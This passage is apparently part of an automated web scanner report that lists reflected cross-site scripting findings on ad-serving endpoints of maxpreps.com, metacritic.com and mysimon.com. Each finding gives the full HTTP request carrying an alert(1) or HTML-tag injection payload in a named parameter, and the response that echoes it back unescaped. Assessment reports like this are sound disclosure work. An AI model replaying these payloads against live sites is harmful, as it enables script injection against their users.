Server: Apache/2.2
Content-Length: 614
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:19 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100fdf8e*/alert(1)//96ca9bd0bf4&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='119' CNET-PTYPE='10' POS='100fdf8e*' NCAT='1:' CNET-PARTNER-
...[SNIP]...

3.644. http://mads.maxpreps.com/mac-ad [PTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload 6d8cf*/alert(1)//f158141c11d was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=20006d8cf*/alert(1)//f158141c11d&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:48 GMT
Server: Apache/2.2
Content-Length: 608
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=20006d8cf*/alert(1)//f158141c11d&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='119' CNE
...[SNIP]...

3.645. http://mads.maxpreps.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into a JavaScript inline comment. The payload e28c4*/alert(1)//925af80422c was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189e28c4*/alert(1)//925af80422c&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:41 GMT
Server: Apache/2.2
Content-Length: 581
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:41 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189e28c4*/alert(1)//925af80422c&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND="64" SITE="18928
...[SNIP]...

3.646. http://mads.maxpreps.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 9b00a<a>afde2a318c1 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=1899b00a<a>afde2a318c1&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:37 GMT
Server: Apache/2.2
Content-Length: 481
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:37 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=1899b00a<a>afde2a318c1&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND="64" SITE="18990023181" NCAT="1:" PTN
...[SNIP]...

3.647. http://mads.maxpreps.com/mac-ad [SP parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the SP request parameter is copied into a JavaScript inline comment. The payload e419a*/alert(1)//fd9cb6abe6a was submitted in the SP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119e419a*/alert(1)//fd9cb6abe6a&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:21 GMT
Server: Apache/2.2
Content-Length: 615
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:21 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119e419a*/alert(1)//fd9cb6abe6a&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='1194191966' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1'
...[SNIP]...

3.648. http://mads.maxpreps.com/mac-ad [SP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the SP request parameter is copied into the HTML document as plain text between tags. The payload 224c0<a>60b526967ee was submitted in the SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63224c0<a>60b526967ee HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:55 GMT
Server: Apache/2.2
Content-Length: 524
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=511793&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63224c0<a>60b526967ee" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='MAXPREPS' BRAND='64' SITE='189' SP='63224060526967' CNET-PTYPE='10' POS='100' NCAT='1:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGROUP *//*
...[SNIP]...

3.649. http://mads.maxpreps.com/mac-ad [celt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the celt request parameter is copied into the HTML document as plain text between tags. The payload c26c0<a>8e9a9773a65 was submitted in the celt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?CLIENT:ID=SJS&celt=jsc26c0<a>8e9a9773a65&x-cb=511793&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=63 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:38:44 GMT
Server: Apache/2.2
Content-Length: 462
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:38:44 GMT


...[SNIP]...

3.650. http://mads.maxpreps.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 61617*/alert(1)//6526c949650 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=161617*/alert(1)//6526c949650&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:16 GMT
Server: Apache/2.2
Content-Length: 1108
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:16 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=161617*/alert(1)//6526c949650&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.651. http://mads.maxpreps.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e6d74*/alert(1)//016793979df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|&e6d74*/alert(1)//016793979df=1 HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:40:28 GMT
Server: Apache/2.2
Content-Length: 1110
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:40:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=451274&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|&e6d74*/alert(1)//016793979df=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.652. http://mads.maxpreps.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.maxpreps.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 78c39*/alert(1)//a37bdf70b87 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?CLIENT:ID=SJS&celt=js&x-cb=45127478c39*/alert(1)//a37bdf70b87&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;| HTTP/1.1
Host: mads.maxpreps.com
Proxy-Connection: keep-alive
Referer: http://www.maxpreps.com/national/national.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210955722.1303947421.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210955722.1047374991.1303947421.1303947421.1303947421.1; __utmc=210955722; __utmb=210955722.1.10.1303947421

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:39:26 GMT
Server: Apache/2.2
Content-Length: 1108
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:39:26 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="CLIENT:ID=SJS&celt=js&x-cb=45127478c39*/alert(1)//a37bdf70b87&NCAT=1%3A&SITE=189&BRAND=64&PTYPE=2000&DVAR_SESSION=c&DVAR_FIRSTPAGE=1&cookiesOn=1&POS=100&SP=119&PAGESTATE=1|11079|;maxpreps.com;;|" _REQ_NUM="0" */document.write('
...[SNIP]...

3.653. http://mads.metacritic.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.metacritic.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload 13f23<a>6d128c6332c was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=50&NCAT=12457%3A&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=29841060&ADREQ&beacon=113f23<a>6d128c6332c&cookiesOn=1 HTTP/1.1
Host: mads.metacritic.com
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolcn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; ctk=NGRiODkwZWZhZGMxZDZmMzZhMmEyNWQ2MzYyNg%3D%3D; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; MAD_SESSION=f; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:05:40 GMT
Server: Apache/2.2
Content-Length: 440
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:05:40 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=50&NCAT=12457%3A&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=29841060&ADREQ&beacon=113f23<a>6d128c6332c&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='1132361286332' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw5.cnet.com::2991684
...[SNIP]...

3.654. http://mads.metacritic.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.metacritic.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1785b'%3balert(1)//f64876df66b was submitted in the PAGESTATE parameter. This input was echoed as 1785b';alert(1)//f64876df66b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1785b'%3balert(1)//f64876df66b&SITE=50&NCAT=12457%3A&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=29841060&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.metacritic.com
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolcn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; ctk=NGRiODkwZWZhZGMxZDZmMzZhMmEyNWQ2MzYyNg%3D%3D; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; MAD_SESSION=f; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:03:29 GMT
Server: Apache/2.2
Content-Length: 233
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:03:29 GMT

/* MAC ad */;window.CBSI_PAGESTATE='1785b';alert(1)//f64876df66b';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c13-ad-xw2.cnet.com::2655816592 2011.04.27.22.03.29 *//* MAC T 0.0.0.0 */

3.655. http://mads.metacritic.com/mac-ad [SITE parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.metacritic.com
Path:	/mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload f793a<a>87e7ae0dbcd was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=50f793a<a>87e7ae0dbcd&NCAT=12457%3A&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=29841060&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.metacritic.com
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geolcn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; geolcl=MTczLjE5My4yMTQuMjQzOjA1NjcyfFN0b3dl; ctk=NGRiODkwZWZhZGMxZDZmMzZhMmEyNWQ2MzYyNg%3D%3D; geolocn=MTczLjE5My4yMTQuMjQzOjg0MA%3D%3D; MAD_SESSION=f; MAD_FIRSTPAGE=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 22:03:59 GMT
Server: Apache/2.2
Content-Length: 470
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 22:03:59 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=50f793a<a>87e7ae0dbcd&NCAT=12457%3A&PTYPE=2001&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=29841060&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='507938770' PTYPE='2001' NCAT='1245
...[SNIP]...

3.656. http://mads.mysimon.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.mysimon.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload b6d27<a>4f7e489a57d was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=8&NCAT=1%3A&PTYPE=9011&CID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81221265&IREFER_HOST=cbsinteractive.com&ADREQ&beacon=1b6d27<a>4f7e489a57d&cookiesOn=1 HTTP/1.1
Host: mads.mysimon.com
Proxy-Connection: keep-alive
Referer: http://www.mysimon.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:45 GMT
Server: Apache/2.2
Content-Length: 471
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=8&NCAT=1%3A&PTYPE=9011&CID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81221265&IREFER_HOST=cbsinteractive.com&ADREQ&beacon=1b6d27<a>4f7e489a57d&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='16274748957' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw20.cnet.com::1149217
...[SNIP]...

3.657. http://mads.mysimon.com/mac-ad [PAGESTATE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.mysimon.com
Path:	/mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0f0f'%3balert(1)//f8f461066ab was submitted in the PAGESTATE parameter. This input was echoed as b0f0f';alert(1)//f8f461066ab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b0f0f'%3balert(1)//f8f461066ab&SITE=8&NCAT=1%3A&PTYPE=9011&CID=&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81221265&IREFER_HOST=cbsinteractive.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.mysimon.com
Proxy-Connection: keep-alive
Referer: http://www.mysimon.com/
